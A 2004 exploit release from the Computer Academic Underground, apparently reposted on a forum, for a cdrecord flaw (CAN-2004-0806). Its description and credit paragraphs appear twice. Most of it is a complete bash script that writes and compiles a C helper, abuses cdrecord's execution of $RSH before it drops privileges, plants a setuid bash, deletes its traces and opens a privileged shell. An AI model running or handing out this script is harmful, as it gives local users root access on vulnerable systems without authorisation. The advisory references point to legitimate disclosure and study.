This shell script writes out and compiles a C application which sets
it's UID to it's EUID and copies a SUID shell to the current directory,
compiles it, then uses cdrecord's use of the $RSH environment variable
to execute it. It then cleans up it's mess and executes the shell for
convenience.
Notes
=====
This exploit is written assuming your target shell is bash.
Credits
=======
Max Vozeler is credited with discovering this vulnerability as stated
in the Mandrake Linux security advisory MDKSA-2004:091.
/ \ / \ | | | |
----====####/ /\__\##/ /\ \##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======######\ \/ /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/
Computer Academic Underground
http://www.caughq.org
Exploit Code
===============/========================================================
Exploit ID: CAU-EX-2004-0002
Release Date: 09/09/2004
Title: cdrecord-suidshell.sh
Description: cdrecord $RSH exec() SUID Shell Creation
Tested: cdrecord 2.00.3
Attributes: Privileged Access
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2004-0002.txt
Author/Email: I)ruid <druid (at) caughq (dot) org [email concealed]>
===============/========================================================
Description
===========
This shell script writes out and compiles a C application which sets
it's UID to it's EUID and copies a SUID shell to the current directory,
compiles it, then uses cdrecord's use of the $RSH environment variable
to execute it. It then cleans up it's mess and executes the shell for
convenience.
Notes
=====
This exploit is written assuming your target shell is bash.
Credits
=======
Max Vozeler is credited with discovering this vulnerability as stated
in the Mandrake Linux security advisory MDKSA-2004:091.
References
==========
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0806
http://www.mandrakesecure.net/en/advisories/advisory.php?
name=MDKSA-2004:091
Exploit
=======
#!/bin/bash
#
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
#
# Exploits cdrecord's exec() of $RSH before dropping privs
#
cat > ./cpbinbash.c << __EOF__
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
main( int argc, char *argv[] ) {
int fd1, fd2;
int count;
char buffer[1];
/* Set ID's */
setuid( geteuid() );
setgid( geteuid() );
/* Copy the shell */
if ((fd1=open( "/bin/bash", O_RDONLY))<0)
return -1;
if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
return -1;
while((count=read(fd1, buffer, 1)))
write(fd2, buffer, count);
free(buffer);
close( fd1 );
close( fd2 );
/* Priv the shell */
chown( "./bash", geteuid(), geteuid() );
chmod( "./bash", 3565 );
}
__EOF__
cc ./cpbinbash.c -o ./cpbinbash
# Set up environment
export RSHSAVE=$RSH
export RSH=./cpbinbash
# Sploit
cdrecord dev= REMOTE:CAU:1,0,0 -
# Cleanup
rm cpbinbash*
export RSH=$RSHSAVE
export RSHSAVE=
# Use our suid bash
./bash -p
[ reply ]